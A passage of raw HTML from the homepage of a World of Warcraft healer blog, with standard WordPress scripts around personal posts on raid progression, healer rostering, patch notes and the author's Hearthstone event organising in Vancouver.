g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='tfg_style-css' href='http://www.worldofmatticus.com/wp-content/plugins/twitter-facebook-google-plusone-share/tfg_style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='streamline-theme-css' href='http://www.worldofmatticus.com/wp-content/themes/streamline/style.css?ver=2.0' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='http://www.worldofmatticus.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-polls-css' href='http://www.worldofmatticus.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.75.2' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('http://www.worldofmatticus.com/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8; } </style> <link rel='stylesheet' id='simple-social-icons-font-css' href='http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/css/style.css?ver=3.0.0' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var impression_object = {"ajax_url":"http:\/\/www.worldofmatticus.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/plugins/adrotate/library/jquery.adrotate.dyngroup.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var click_object = {"ajax_url":"http:\/\/www.worldofmatticus.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/svgxuse.js?ver=1.1.21'></script> <link rel='https://api.w.org/' href='http://www.worldofmatticus.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.worldofmatticus.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.worldofmatticus.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <!-- This site is using AdRotate v5.0 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ --> <!-- AdRotate CSS --> <style type="text/css" media="screen"> .g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; } .g img { height:auto; } .g-col { position:relative; float:left; } .g-col:first-child { margin-left: 0; } .g-col:last-child { margin-right: 0; } .g-1 { margin:1px; } .g-2 { margin:1px; } .g-3 { margin:1px; } .g-4 { margin:1px; } .g-5 { margin:1px; } .g-6 { margin:1px; } @media only screen and (max-width: 480px) { .g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; } } </style> <!-- /AdRotate CSS --> <!-- Start Of Script Generated By cforms v11.6.1 [Oliver Seidel | www.deliciousdays.com] --> <link rel="stylesheet" type="text/css" href="http://www.worldofmatticus.com/wp-content/plugins/cforms/styling/minimal.css" /> <script type="text/javascript" src="http://www.worldofmatticus.com/wp-content/plugins/cforms/js/cforms.js"></script> <!-- End Of Script Generated By cforms --> <style type="text/css"> .enews .screenread { height: 1px; left: -1000em; overflow: hidden; position: absolute; top: -1000em; width: 1px; } </style> <!-- Facebook Like Thumbnail --> <link rel="image_src" href="http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong-590x332.png" /> <!-- End Facebook Like Thumbnail --> <link rel="icon" href="http://www.worldofmatticus.com/wp-content/themes/streamline/images/favicon.ico" /> <link rel="pingback" href="http://www.worldofmatticus.com/xmlrpc.php" /> <script type="text/javascript" src="http://static.wowhead.com/widgets/power.js"></script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-2961307-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script><style type="text/css">#header { background: url(http://www.worldofmatticus.com/wp-content/uploads/2013/05/wom-header1.png) no-repeat !important; }</style> <style type="text/css" id="custom-background-css"> body.custom-background { background-image: url("http://www.worldofmatticus.com/wp-content/uploads/bg.jpg"); background-position: left top; background-size: auto; background-repeat: repeat; background-attachment: scroll; } </style> </head> <body class="home blog custom-background custom-header header-image content-sidebar"><div id="wrap"><div id="header"><div class="wrap"><div id="title-area"><h1 id="title"><a href="http://www.worldofmatticus.com/">World of Matticus</a></h1><p id="description">Blog for World of Warcraft healers and raiders</p></div><div class="widget-area header-widget-area"><div id="simple-social-icons-2" class="widget simple-social-icons"><div class="widget-wrap"><ul class="alignleft"><li class="ssi-email"><a href="mailto:[email protected]" ><svg role="img" class="social-email" aria-labelledby="social-email-2"><title id="social-email-2">Email</title><use xlink:href="http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-email"></use></svg></a></li><li class="ssi-facebook"><a href="http://www.facebook.com/worldofmatticus" ><svg role="img" class="social-facebook" aria-labelledby="social-facebook-2"><title id="social-facebook-2">Facebook</title><use xlink:href="http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-gplus"><a href="https://plus.google.com/b/107593926955739783299/" ><svg role="img" class="social-gplus" aria-labelledby="social-gplus-2"><title id="social-gplus-2">Google+</title><use xlink:href="http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-gplus"></use></svg></a></li><li class="ssi-pinterest"><a href="http://pinterest.com/mattycus/" ><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-2"><title id="social-pinterest-2">Pinterest</title><use xlink:href="http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="http://www.twitter.com/matticus" ><svg role="img" class="social-twitter" aria-labelledby="social-twitter-2"><title id="social-twitter-2">Twitter</title><use xlink:href="http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li><li class="ssi-youtube"><a href="http://www.youtube.com/worldofmatticus" ><svg role="img" class="social-youtube" aria-labelledby="social-youtube-2"><title id="social-youtube-2">YouTube</title><use xlink:href="http://www.worldofmatticus.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-youtube"></use></svg></a></li></ul></div></div> </div></div></div><div id="nav"><div class="wrap"><ul id="menu-main-menu" class="menu genesis-nav-menu menu-primary js-superfish"><li id="menu-item-11433" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-11433"><a href="http://www.worldofmatticus.com" aria-current="page">Home</a></li> <li id="menu-item-11434" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11434"><a href="http://www.worldofmatticus.com/about/">About</a> <ul class="sub-menu"> <li id="menu-item-11438" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11438"><a href="http://www.worldofmatticus.com/contact-matticus/commenting-policy/">Commenting Policy</a></li> <li id="menu-item-11442" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11442"><a href="http://www.worldofmatticus.com/contact-matticus/twitter-policy/">Twitter Policy</a></li> <li id="menu-item-11439" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11439"><a href="http://www.worldofmatticus.com/contact-matticus/posting-policy/">Posting Policy</a></li> <li id="menu-item-15155" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15155"><a href="http://www.worldofmatticus.com/advertise/">Advertising</a></li> </ul> </li> <li id="menu-item-11436" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-11436"><a href="http://www.worldofmatticus.com/contact-matticus/">Contact</a> <ul class="sub-menu"> <li id="menu-item-11440" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11440"><a href="http://www.worldofmatticus.com/contact-matticus/email/">Subscribe by Email</a></li> <li id="menu-item-11441" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11441"><a href="http://www.worldofmatticus.com/contact-matticus/want-to-contribute/">Want to Contribute?</a></li> </ul> </li> <li id="menu-item-11427" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11427"><a href="http://www.worldofmatticus.com/blogging-tips/">Blogging</a></li> <li id="menu-item-11428" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11428"><a href="http://www.worldofmatticus.com/guild-management/">Guilds and Raiders</a></li> <li id="menu-item-11477" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11477"><a href="http://www.worldofmatticus.com/videos/">Videos</a></li> <li id="menu-item-15770" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15770"><a href="http://www.worldofmatticus.com/enjin-guild-hosting-info/">Guild Hosting</a></li> <li class="right rss"><a rel="nofollow" href="http://feeds.feedburner.com/WorldOfMatticus">Posts</a><a rel="nofollow" href="http://feeds.feedburner.com/CommentsForWorldOfMatticus">Comments</a></li></ul></div></div><div id="subnav"><div class="wrap"><ul id="menu-second-menu" class="menu genesis-nav-menu menu-secondary js-superfish"><li id="menu-item-11912" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11912"><a href="http://www.worldofmatticus.com/loot-systems/">Loot Systems</a></li> <li id="menu-item-11913" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11913"><a href="http://www.worldofmatticus.com/managing-players/">Managing Players</a></li> <li id="menu-item-11914" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11914"><a href="http://www.worldofmatticus.com/raiding-tips/">Raiding Tips</a></li> <li id="menu-item-11915" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11915"><a href="http://www.worldofmatticus.com/guild-policies/">Guild Policies</a></li> <li id="menu-item-15075" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15075"><a href="http://www.worldofmatticus.com/challenge-modes/">Challenge Modes</a></li> <li id="menu-item-15360" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15360"><a href="http://www.worldofmatticus.com/addons-and-interfaces/">Addons and Interfaces</a></li> <li id="menu-item-15385" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15385"><a href="http://www.worldofmatticus.com/hearthstone-deck-ideas/">Hearthstone</a></li> </ul></div></div><div id="inner"><div class="wrap"><div class="breadcrumb"><div class="inner"><span class="home"></span>Home</div></div><div id="home-featured"><div class="home-featured-1"><div id="featured-page-2" class="widget featured-content featuredpage"><div class="widget-wrap"><h4 class="widget-title widgettitle">Priest Tips</h4> <div class="post-9743 page type-page status-publish hentry entry"><p style="text-align: center;">For Holy and Discipline Priests. Beginners and Advanced players.</p> <p><img title="Priest tips" alt="Priest tips" src="http://www.worldofmatticus.com/wp-content/uploads/ability_priest_archangel.jpg" width="56" height="56" align="center" /></p> <p style="text-align: center;"> <a href="http://www.worldofmatticus.com/priest-tips/#more-9743" class="more-link">Read more&#8230;</a></p> </div></div></div></div><!-- end .home-featured-1 --><div class="home-featured-2"><div id="featured-page-3" class="widget featured-content featuredpage"><div class="widget-wrap"><h4 class="widget-title widgettitle">Guilds and Raids</h4> <div class="post-9784 page type-page status-publish hentry entry"><p style="text-align: center;">Optimize your guild for raids and learn to manage player expectations.</p> <p style="text-align: center;"><img title="Managing guilds and raids" alt="Managing guilds and raids" src="http://www.worldofmatticus.com/wp-content/uploads/inv_guild_standard_alliance_b.jpg" width="56" height="56" align="center" /></p> <p> <a href="http://www.worldofmatticus.com/guild-management/#more-9784" class="more-link">Read more&#8230;</a></p> </div></div></div></div><!-- end .home-featured-2 --><div class="home-featured-3"><div id="featured-page-4" class="widget featured-content featuredpage"><div class="widget-wrap"><h4 class="widget-title widgettitle">Warlords of Draenor</h4> <div class="post-15650 page type-page status-publish hentry entry"><p style="text-align: center;">Find out what the new updates in Warlords of Draenor are.</p> <p style="text-align: center;"><img alt="WarlordsIcon" src="http://www.worldofmatticus.com/wp-content/uploads/2014/04/WarlordsIcon.png" width="56" height="56" align="center" /></p> <p> <a href="http://www.worldofmatticus.com/warlords-of-draenor-healer-information/#more-15650" class="more-link">Read more&#8230;</a></p> </div></div></div></div><!-- end .home-featured-3 --></div><!-- end #home-featured --><div id="content-sidebar-wrap"><div id="content" class="hfeed"><a href="http://www.worldofmatticus.com/five-months-later-new-expansion/" rel="bookmark"><img class="post-photo" src="http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong-642x250.png" alt="Five Months Later and a New Expansion" /></a><div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2018-09-03T20:20:52-07:00">September 3, 2018</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/five-months-later-new-expansion/#respond">Leave a Comment</a></span> </div> <div class="post-wrap"> <div class="post-16281 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/five-months-later-new-expansion/">Five Months Later and a New Expansion</a></h2> <div class="entry-content"><p>The Battle for Azeroth has arrived. With it, we get to explore new lands and face new (or old) villains. I remember the last real mention of Kul Tiras was in the old Warcraft 3: The Frozen Throne. It was the Horde side campaign where you played as Rexxar. This was one of the first times where the Horde invaded Theramore and where Daelin Proudmoore ultimately met his demise. Fast forward to World of Warcraft, and Kul Tiras had a few mentions and appearances throughout the game like those early zones in Tiragarde Keep which held Kul Tiran marines. The formal arrival of Kul Tiras into the game answered many questions for me and it was like revisiting the past in a new light. In Warcraft 2, Kul Tiras fleets were the backbone of the Alliance naval forces. So it was always weird to me that when WoW came out, you knew what happened to the Kingdoms of Lordaeron, Stromgard, Alterac, the Kirin Tor, and the rest of the different Alliance factions, but Kul Tiras was nowhere to be found. It was after the events of the first Horde assault on Theramore that we never found out what formally happened to them &#8212; Until now.</p> <p style="text-align: center;"><img class="aligncenter size-large wp-image-16286" src="http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong-590x332.png" alt="" width="590" height="332" srcset="http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong-590x332.png 590w, http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong-107x60.png 107w, http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong-768x432.png 768w, http://www.worldofmatticus.com/wp-content/uploads/2018/09/Stormsong.png 960w" sizes="(max-width: 590px) 100vw, 590px" /></p> <h3>Levelled to 120 &#8211; Twice</h3> <p>Ugh, I think I&#8217;m getting too old for this. Reaching 120 on the Priest was just agonizing as Shadow, but I still managed to do it. My server, Proudmoore, went down for about an hour during the evening. I didn&#8217;t end up hitting 120 until about 6 AM. After clearing out the first emissary, I took a nice nap before waking up and striking through into heroics and mythic 0&#8217;s.</p> <p>We can&#8217;t seem to recruit Rogues for the life of us, so if there&#8217;s any free agent Rogues out there, <a href="https://proper-villains.enjin.com/">check us out</a>. It&#8217;s a great guild with a fantastic, but disciplined atmosphere. I love our pacing and level of organization at all areas. One of the few downsides are the few dad jokes or feeble attempts at assorted puns. Like, c&#8217;mon guys, it seems that raid progression is inversely proportional to quality of dad jokes. I&#8217;d totally step into that arena and show these guys how it&#8217;s done, but I don&#8217;t want to jeopardise my raid spot for being <em>too</em> witty, know what I mean?</p> <p>The past couple of weeks have been fairly calm. Week one was all about rushing characters to 120 &#8212; In my case, it was my Priest (main) and my Ret Paladin. Previous expansions, I would have levelled up my Elemental Shaman first. I will say that after the Priest, playing Ret was a relief. I could delete anything without taking forever. I had assorted outs at my disposal in case I unexpectedly over pulled (and those of you who have levelled with me know that happens fairly often).</p> <p>Tomorrow, my real game begins. The raiding season starts again. After almost a month off of no raids, the time has come to zero in on health bars and ensure I don&#8217;t stand in bad. I am so excited. Miss my res cloak though :(.</p> <p>I also miss my talking knife. She kept me company throughout Legion. What would she say now if she were by my side?</p> <h3>The Gaming Stadium</h3> <p>Speaking of unexpected, an opportunity came my way to help grow the esports scene in Vancouver. I&#8217;ve been a Hearthstone Fireside organizer since 2014. One of my constant challenges is finding a venue to run an event out of. The back of hobby and comic book shops, to University lecture rooms, coworking spaces, convention halls, and casino ballrooms have been different places where I could hold Hearthstone.</p> <p>Then out of the blue, the idea of a dedicated esports community centre came up. Anyone that lives in the Vancouver area know that there&#8217;s already enough LAN centers here. Players go in and play with their friends for a few hours on Fortnite or League of Legends, or what have you. The pitch to me was, &#8220;not just another LAN center&#8221;. Regular, recurring tournaments would be a priority. Recreational weekly leagues would be on the calendar (like a beer league for gamers). We could have a space to watch majors or host viewing parties for HCT or OWL games on a big screen with your friends instead of at home. Vancouver hosted The International last month, and the packed atmosphere was crazy.</p> <p>I haven&#8217;t heard Rogers arena that loud and energetic since 2011 (That&#8217;s a Canucks self burn, by the way #Sadface).</p> <p>Another thing that came up was during my time hosting Hearthstone tournaments, I&#8217;d get into conversations with parents who were asking about coaching for their daughter, or their son wanted to learn how to play a specific deck. The best I could do was point them out to a few players and have them observe. But now I&#8217;d be in a position where we could run like a bootcamp, a Hearthstone master class, or like a Fortnite 101 and invite local community players to provide a crash course.</p> <p>Lastly, this one might be a little more selfish on my part than anything. There&#8217;s been some unflattering news lately about Riot and but <a href="https://www.riotgames.com/en/who-we-are/our-first-steps-forward">they&#8217;re attempting to turn their culture around</a>. There&#8217;s an opportunity here to affect and influence players at the local level to be a less toxic, to play nice, and to play fair. It&#8217;ll be good to remind players when they&#8217;re in here that there&#8217;s another person on the other side of that character whether it&#8217;s on their team or on the opposition. I can&#8217;t change the world overnight, but if I can shape even a fraction of younger players to be less toxic, less misogynistic, and more welcoming, maybe I can do some good here in the long run. It&#8217;s too late for me to compete on any kind of world stage. I grew up too early. But maybe one day I can say that we had a hand here in developing players and gave them the right amount of media training and guidance to compete in the HCT or Overwatch League and not get suspended or ejected for behavioural issues. Or maybe it&#8217;s a lost cause, I don&#8217;t know. Too optimistic and naive? Probably. I have to try.</p> <p>Wait a minute though, what does this mean for raiding? Won&#8217;t this eat up most of my time? Thankfully, my guild won&#8217;t have to worry too much &#8212; I specifically negotiated a clause where I could raid from the office uninterrupted in the evenings if it was needed.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2018-04-01T09:59:46-07:00">April 1, 2018</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/hellooo-argus/#comments">2 Comments</a></span> </div> <div class="post-wrap"> <div class="post-16275 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/hellooo-argus/">Hellooo Argus!</a></h2> <div class="entry-content"><p>Mythic Argus. It&#8217;s been a long time since I&#8217;ve been at an end boss of an expansion with so much time before the <em>next</em> expansion release. We did reach him a weeks ago and have slowly chipped away to the point where we&#8217;re consistently-ish getting into phase 3. Our struggle now appears to be in mastering the movement of Argus slowly around the perimeter of the room &#8212; With everyone alive. Raid extensions are now in full swing. We haven&#8217;t done a Mythic re-clear since the first time we killed Aggramar and we&#8217;ve committed. With the gear options from Mythic+ and titanforging chances from Heroic or Normal, we haven&#8217;t had much of a real need to go back and spend that week on re-clears.</p> <p>Right, I forgot to mention, I passed my trial. I didn&#8217;t think I was going to make it.</p> <p>I find myself in the precarious position of splitting healing time on Argus. There are five healers on the roster but only four can be taken into the encounter. There are essentially two ways to go about approaching progression here rosterwise:</p> <p><strong>Option A</strong>: Shorten the bench significantly. Pack 4 healers and use them as often as possible. Now each healer gets the same amount of practice and experience with opportunity to learn. If all goes well, they&#8217;ll be well-versed in the different timings and nuances of Argus. Though depending on the personality of the benched healer, they might not take kindly to that which could result in a departure.</p> <p><strong>Option B</strong>: Rotate and split healers throughout the night. Alternate players during the raid night. Healers now have a varying degree of experience against Argus, and some will have more than others. By diversifying though, no healer is left too far behind in case a player is unable to attend a night which could severely hamper progression.</p> <p>The longer progression attempts go, the better option B looks. That&#8217;s ultimately what we decided to do. I would have been prepared to go with option A and set up camp on the bench just to speed progression attempts along and get the kill quicker. I just want to see Argus dead. Maybe I don&#8217;t get in on the first kill or two, but as long as I can secure it later, I&#8217;ll be satisfied with it. If this was years ago, I would&#8217;ve been disappointed at not being involved in the first guild kill. Now I&#8217;m at a point where I&#8217;m comfortable getting in on it later.</p> <p>What happens once Argus is down? I suppose I could relax a bit and come back to Battle for Azeroth later or stick to a lowered raiding schedule. But now I&#8217;m getting ahead of myself. We need to crush Argus first.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-12-06T09:20:26-07:00">December 6, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/dear-friends/#comments">2 Comments</a></span> </div> <div class="post-wrap"> <div class="post-16268 post type-post status-publish format-standard hentry category-all tag-antorus entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/dear-friends/">Dear Friends</a></h2> <div class="entry-content"><p>We&#8217;re entering the holiday season! I hope everyone&#8217;s been doing well. The past few months have been quite taxing. Some updates are in order, perhaps.</p> <h3>Warcraft</h3> <p>Antorus is just lovely isn&#8217;t it? From a difficulty standpoint, it feels a little easier compared to Tomb of Sargeras. Argus went down much quicker compared to Kil&#8217;jaeden. Agrammar wasn&#8217;t as challenging as Avatar. I&#8217;m trialing with a new guild on Proudmoore and we&#8217;ll see how that goes. The mind is willing capable, but the body may be slow to act which could tank my shot at making their roster for mythic. I&#8217;m okay with that though. I&#8217;m at the point in the game where if I don&#8217;t crack the starting lineup but am good enough to keep as a second option in case of absences, I can live with that.</p> <p>I&#8217;m still playing Holy but it does look like Discipline might be integral to this tier. I regret not trying to learn the new Disc style of play as much as I should have. Now I&#8217;m playing catchup in learning both a new spec <em>and</em> new encounters.</p> <p>Speaking of Antorus, going into week 2 of Antorus after the hot fixes was a little more challenging. We ran into the Coven of Shivarra block. If you missed the hot fixes from yesterday, the key is that the health of the ads now scale up. Whoops. We&#8217;re gradually losing players over the course of the fight (Healing absorbs, or storms seem to be the one picking players off). Day 1 was just heroic for chances at tier pieces and trinkets. The rest of the week will be aimed at Mythic and that&#8217;ll be the real test.</p> <blockquote><p><strong>Antorus, the Burning Throne</strong></p></blockquote> <ul> <li> <blockquote><p><strong>Coven of Shivarra</strong></p> <ul> <li>Corrected an issue that caused the health of Torments to not properly scale with raid size.</li> </ul> </blockquote> </li> <li> <blockquote><p><strong>Eonar the Life-Binder</strong></p> <ul> <li>Players who are disconnected during the Eonar encounter will have access to Surge of Life once they reconnect.</li> </ul> </blockquote> </li> <li> <blockquote><p><strong>Argus the Unmaker</strong></p></blockquote> <ul> <li> <blockquote><p>Cheat Death and similar effects will not reset their cooldowns when you die during the final phase of the Argus the Unmaker encounter.</p></blockquote> </li> <li> <blockquote><p>Boss Health increased by 10% on Normal and Heroic difficulties</p></blockquote> </li> <li> <blockquote><p>Soulbomb and Soulburst now deal periodic damage more rapidly</p></blockquote> </li> <li> <blockquote><p>Edge of Obliteration damage increased by 50%</p></blockquote> </li> <li> <blockquote><p>Constellar elemental vulnerabilities reduced from +200% to +100% damage taken</p></blockquote> </li> </ul> </li> </ul> <h3>Hearthstone</h3> <p>I&#8217;ve taken on the full mantle as an Innkeeper now and organizing local Fireside Gatherings and tournaments. Blizzard entrusted me with the opportunity of hosting the HCT Summer playoffs in Vancouver and it was incredible. 110 players showed up to play some Hearthstone and watch the tournament over that September weekend. I am definitely down for doing it again. It&#8217;s a significant logistical challenge in some ends. You have to find a venue that fits within your budget. You also need to ensure there&#8217;s an area where the competitors can play in peace away from the rest of the attendees to minimize distractions. The attendees that are also there would also want to be able to follow and watch the stream so there needs to be the equipment for it somehow. It also helps to make sure you have activities for them to do throughout the weekend. It could be tournaments, or mini events, or deck building challenges.</p> <p>Although Hearthstone&#8217;s in the offseason right now, I&#8217;ve got a launch party coming up this weekend to run to help celebrate the <a href="http://blizzardwatch.com/2017/12/04/hearthstones-kobolds-catacombs-expansion-cards-far/">Kobolds and Catacombs opening</a>.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> <span class="tags">Tagged: <a href="http://www.worldofmatticus.com/tag/antorus/" rel="tag">Antorus</a></span></div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-08-18T07:59:30-07:00">August 18, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/sisters-can-real-pain/#comments">2 Comments</a></span> </div> <div class="post-wrap"> <div class="post-16262 post type-post status-publish format-standard hentry category-all entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/sisters-can-real-pain/">Sisters Can be a Real Pain</a></h2> <div class="entry-content"><p>We&#8217;re getting the fight consistently down to about 55% but it wasn&#8217;t until yesterday we had a breakthrough and started seeing attempts go into phase 3. A personal raid best of 28%? Seems good! What seems to be killing us the most are the Glaive Storms but just grinding it out and practicing it repeatedly has given most players the experience of seeing and reacting to it. On average, I think most players can survive getting one tick of it (or maybe two ticks if there&#8217;s a Spirit Link or a damage reduction ability going off). Still, players do get repeatedly picked off with the Throwing Glaive (the one that homes in on the player), and Phoenix Style often reports these guys as taking 2.5 million damage or more almost always resulting in an instagib.</p> <p>If we had a consistent and stable roster, we&#8217;d be making further progress. Having a turnover of around 2-3 players a week (or at least, that&#8217;s what it feels like) means we&#8217;re constantly retraining players to get accustomed to the new abilities and our system which is just depressing. At the rate we&#8217;re going though, we should be able to knock this encounter out within the next week or two.</p> <h3>Healing comp</h3> <p>Our composition&#8217;s a little funky. Right now, we&#8217;re running with a Druid, a Monk, a Shaman, a Holy Priest (me), and a Holy Paladin. One of us can sit but lately we&#8217;ve been fielding 5 healers during Mythic. Our 6th healer on sisters usually results in an extra Paladin or an extra Priest (who&#8217;s Discipline). Pretty handy having that stability in the healing area.</p> <h3>Healing CDs</h3> <p>We don&#8217;t have much in defensive cooldowns outside of healing ones which makes me sad. Zero Warriors. One Demon Hunter. One Shadow Priest. So no extra help from outside the healing corps. We&#8217;ve nailed down when healing cooldowns ought to be used in the first and second phases, but the third phase is going to be a pain. It&#8217;s nice that we don&#8217;t have to stack up to maximize healing off the bubble, however we still need to remain somewhat in a line for the Incorporeal Shot to ensure it gets soaked. But we still need to adjust and get used to the Glaive Storm bouncing all over the place.</p> <p>So close :(.</p> </div><div class="post-meta"><span class="categories">Filed Under: <a href="http://www.worldofmatticus.com/category/all/" rel="category tag">All Stories</a></span> </div></div> </div> <div class="post-info"><span class="author vcard"><span class="fn"><a href="http://www.worldofmatticus.com/author/matticus/" rel="author">Matticus</a></span></span> <span class="date published time" title="2017-08-05T10:58:00-07:00">August 5, 2017</span> <span class="post-comments"><a href="http://www.worldofmatticus.com/a-tale-of-magery/#respond">Leave a Comment</a></span> </div> <div class="post-wrap"> <div class="post-16259 post type-post status-publish format-standard hentry category-all category-guild-topics category-raiding-guild-topics entry"><h2 class="entry-title"><a class="entry-title-link" rel="bookmark" href="http://www.worldofmatticus.com/a-tale-of-magery/">A Tale of Magery</a></h2> <div class="entry-content"><p>Last time I wrote something, we were 3/10 Mythic in Nighthold. Now we&#8217;re 3/9 Mythic in Tomb of Sargeras. Sisters is giving us a hard time but the worst boss is often seasonal. In fact, I&#8217;d wager most guilds have had to deal with it at some point or other.</p> <p>I call it the summer raiding boss.</p> <p>We&#8217;ve experienced some roster turnover the last few weeks with players going on a hiatus due to burnout or just getting bored of the game. For the first time in forever, we actually have slots open for melee. Usually those spots were hard to get into. Alas, we don&#8217;t have a guild front end so if you&#8217;re interested, drop me a line on <a href="http://www.twitter.com/matticus">Twitter</a> or <a href="https://www.wowprogress.com/guild/us/kel-thuzad/Ninja+Pirate+Monkeys">go 